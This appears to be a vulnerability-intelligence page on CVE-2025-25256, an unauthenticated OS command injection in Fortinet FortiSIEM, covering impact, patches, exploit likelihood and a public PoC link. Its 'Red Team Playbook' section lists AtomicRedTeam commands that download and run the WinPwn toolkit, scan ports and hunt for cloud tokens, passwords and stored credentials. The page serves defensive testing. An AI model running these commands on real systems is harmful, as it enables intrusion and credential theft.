CVE-2025-25256
Overview
This vulnerability is an OS command injection flaw caused by improper neutralization of special elements within command inputs. The root cause lies in Fortinet FortiSIEM's CLI request handling where unvalidated user-supplied input is directly incorporated into operating system commands. The affected component is the command-line interface processing functionality in FortiSIEM versions 6.7.9 and earlier through 7.3.1.
Vulnerability Description
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSIEM version 7.3.0 through 7.3.1, 7.2.0 through 7.2.5, 7.1.0 through 7.1.7, 7.0.0 through 7.0.3 and before 6.7.9 allows an unauthenticated attacker to execute unauthorized code or commands via crafted CLI requests.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to execute arbitrary OS commands with the privileges of the FortiSIEM service. No authentication or user interaction is required (CVSS vector AV:N/AC:L/PR:N/UI:N), enabling full compromise of the affected system. This can lead to unauthorized code execution, data exposure, service disruption, and potential lateral movement within the network, severely impacting organizational security posture.
Solution
Fortinet recommends applying the patches provided in the FortiGuard advisory FG-IR-25-152, which addresses this issue in FortiSIEM versions 7.3.2 and later, 7.2.6 and later, 7.1.8 and later, 7.0.4 and later, and 6.7.10 and later. Administrators should upgrade affected FortiSIEM instances to these fixed versions immediately. Detailed patch instructions and version-specific guidance are available at https://fortiguard.fortinet.com/psirt/FG-IR-25-152.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet's FortiSIEM products stems from an improper handling of special elements within operating system commands, specifically allowing for OS command injection. This flaw exists in multiple versions of the software, including 7.3.0 to 7.3.1, 7.2.0 to 7.2.5, 7.1.0 to 7.1.7, 7.0.0 to 7.0.3, and prior to 6.7.9. The core issue arises when the system fails to adequately sanitize user input, enabling an attacker to craft malicious command-line interface (CLI) requests that can be executed by the underlying operating system. Such a vulnerability can lead to unauthorized command execution, potentially allowing attackers to manipulate system behavior, access sensitive data, or disrupt services.
Attack vectors for exploiting this vulnerability are particularly concerning due to the potential for unauthenticated access. An attacker could leverage this flaw by sending specially crafted CLI requests to the FortiSIEM system, bypassing authentication mechanisms entirely. This could be executed remotely, making it accessible to a wide range of threat actors. Scenarios may include executing arbitrary commands to extract sensitive information, installing malware, or even pivoting to other systems within the network. The ability to execute commands without authentication significantly amplifies the risk, as it lowers the barrier for exploitation and increases the likelihood of widespread damage.
The real-world impact of such a vulnerability can be catastrophic for organizations relying on FortiSIEM for security information and event management. Successful exploitation could lead to data breaches, loss of sensitive information, and significant operational disruptions. The business risks extend beyond immediate financial loss; they include reputational damage, regulatory penalties, and long-term trust issues with customers and stakeholders. Organizations may also face increased scrutiny from regulators, especially if sensitive data is compromised, leading to further financial and operational repercussions.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating FortiSIEM to the latest patched versions is crucial, as vendors typically address such vulnerabilities in subsequent releases. Additionally, employing intrusion detection systems (IDS) can help identify unusual CLI activity indicative of exploitation attempts. Network segmentation and strict access controls should also be enforced to limit exposure to the vulnerable system. Regular security audits and penetration testing can further enhance an organization's security posture, ensuring that potential vulnerabilities are identified and remediated before they can be exploited.
In conclusion, the OS command injection vulnerability in Fortinet's FortiSIEM products presents a significant threat to organizations utilizing this software. The ease of exploitation, combined with the potential for severe consequences, underscores the importance of proactive security measures. By prioritizing timely updates, employing robust detection mechanisms, and fostering a culture of security awareness, organizations can mitigate the risks associated with this vulnerability and safeguard their critical assets.
CSURFACE threat intelligence has identified a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2025-25256, rising by over 14% and currently positioned near the 99th percentile. This upward trend, coupled with a nearly 20% increase over the past week, indicates growing interest and potential exploitation attempts targeting Fortinet FortiSIEM deployments. While no new proof-of-concept exploits have surfaced, the elevated EPSS score reflects heightened attacker focus and an increased likelihood of exploitation in the near term. For defenders, this signals a need for heightened vigilance as the vulnerability’s exploitation risk is intensifying, potentially leading to more frequent or sophisticated attacks. Consequently, the overall threat level for this OS command injection flaw should be considered elevated, reinforcing its critical status and underscoring the urgency for continuous monitoring within affected environments.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortisiem | All |
cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
|
watchtowrlabs | 19 | 5 | 2025-08-15 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-25256 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-25-152 |
| theregister.com |
NVD API
Third Party Advisory
|
https://www.theregister.com/2025/08/13/fortinet_discloses_critical_bug/ |
| github.com |
NVD API
|
https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256 |
| labs.watchtowr.com |
NVD API
|
https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/ |